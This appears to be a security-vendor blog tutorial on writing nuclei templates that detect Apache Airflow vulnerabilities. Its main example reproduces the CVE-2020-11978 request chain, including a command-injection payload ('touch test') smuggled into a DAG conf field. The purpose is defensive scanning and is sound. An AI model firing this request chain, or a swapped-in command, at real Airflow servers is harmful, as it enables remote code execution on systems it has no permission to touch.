-

4 min read

Writing security templates for Apache Airflow

Writing security templates for Apache Airflow

Share

Apache Airflow is an Open Source tool that allows users "programmatically author, schedule and monitor workflows". We decided to create a suite of checks for testing security of Airflow installations and document the entire process to show how easy it is to write custom nuclei templates for any piece of technology.

Environment Setup

Before we start with template creation, we need to set up an airflow instance for testing. We found this repo on GitHub with the docker-compose file to set up a local airflow instance. By default, the docker-compose presented isn't configured with a password.

bash

1wget https://raw.githubusercontent.com/pberba/CVE-2020-11978/main/docker-compose.yml
2docker-compose up

Now we have docker-compose based Apache Airflow instance running at http://127.0.0.1:8080, Starting with this tweet, we found this GitHub project by @pberba with python exploit for CVE-2020-11978.

What next? we wanted to quickly port this python exploit into nuclei template. For creating a nuclei template, all we need is HTTP requests for reproducing the bug. The easiest way to capture all the HTTP requests originating from python exploit script is to use HTTP_PROXY environment variable to proxy all the requests.

bash

1HTTP_PROXY=http://127.0.0.1:8888 python CVE-2020-11978.py http://127.0.0.1:8080

This runs python exploit and capture all the HTTP request made by python script to our proxy host running at http://127.0.0.1:8888 .It could be Burp proxy / proxify or any other proxy of your choice. Once we have required HTTP requests, we just need to copy-paste it in our template in raw section and configure the matchers/extractors based on the exploit and requests.

Here is how the request block of nuclei template look like -

yaml

1requests:
2  - raw:
3      - |
4        GET /api/experimental/test HTTP/1.1
5        Host: {{Hostname}}
6        Connection: close
7        Accept-Encoding: gzip, deflate
8        Accept: */*
9        
10      - |
11        GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
12        Host: {{Hostname}}
13        Connection: close
14        Accept-Encoding: gzip, deflate
15        Accept: */*
16        
17      - |
18        POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
19        Host: {{Hostname}}
20        Connection: close
21        Accept-Encoding: gzip, deflate
22        Accept: */*
23        Content-Length: 85
24        Content-Type: application/json
25        
26        {"conf": {"message": "\\"; touch test #"}}
27        
28      - |
29        GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
30        Host: {{Hostname}}
31        Connection: close
32        Accept-Encoding: gzip, deflate
33        Accept: */*

This template consist of 4 HTTP request including {{exec_date}} dynamic value in the final request which is actually execution_date that we receive in the Response of 3rd HTTP request.

We can use extractors to get value from any HTTP request defined in the template and reuse further HTTP requests. As an example, for this exploit we used extractors to capture exec_data from 3rd HTTP Response using regex and stored in exec_date named variable which is finally used in the last request as {{exec_date}}

yaml

1extractors:
2      - type: regex
3        name: exec_date
4        part: body
5        group: 1
6        internal: true
7        regex:
8          - '"execution_date":"([0-9-A-Z:+]+)"'

We also used internal: true as we wanted to use this data internally as a variable since by default extractors gets printed in CLI output.

Final and most important part of the template is defining the matcher, Nuclei results are as good as the matcher, we need to ensure we configure the unique matcher to avoid any possibility of false-positive results.

yaml

1req-condition: true
2    matchers-condition: and
3    matchers:
4      - type: dsl
5        dsl:
6          - 'contains(body_4, "operator":"BashOperator")'
7          - 'contains(all_headers_4, "application/json")'
8        condition: and

While writing a template including multiple HTTP requests it's better to use req-condition: true that allows us to configure matcher per specific request, for this exploit if the target is vulnerable, the response of the 4th HTTP request will have "operator":"BashOperator" string.

Here body_4, all_headers_4 trailing digits indicate the request numbers. The complete template to detect Apache Airflow <= 1.10.10 - Example Dag Remote Code Execution is thus accomplished.

Similarly, we prepared Apache Airflow detection template and a workflow to run multiple templates to assess the security of Airflow instances that includes the following checks -

Now, we can simply prepare a workflow that runs the airflow detection template, and if detected, run all the related template as defined below -

yaml

1workflows:
2
3  - template: technologies/airflow-detect.yaml
4    subtemplates:
5      - template: cves/2020/CVE-2020-11978.yaml
6      - template: cves/2020/CVE-2020-13927.yaml
7      - template: exposed-panels/airflow-panel.yaml
8      - template: exposures/configs/airflow-configuration-exposure.yaml
9      - template: default-logins/apache/airflow-default-credentials.yaml
10      - template: misconfiguration/airflow/

bash

1nuclei -w workflows/airflow-workflow.yaml -list airflow_urls.txt

Similarly, you can prepare sets of templates for any specific technology with known issues and easily automate the security flow in the organization. You can craft a template for the specific bug class you find most so you don't have to repeat the manual steps again for any number of hosts you are testing. Write the template once and use it forever 😉

If you have created checks for Airflow / Similar Solutions and want to contribute them to the growing community of public templates, do consider making a PR or Opening an Issue in the nuclei-templates repository.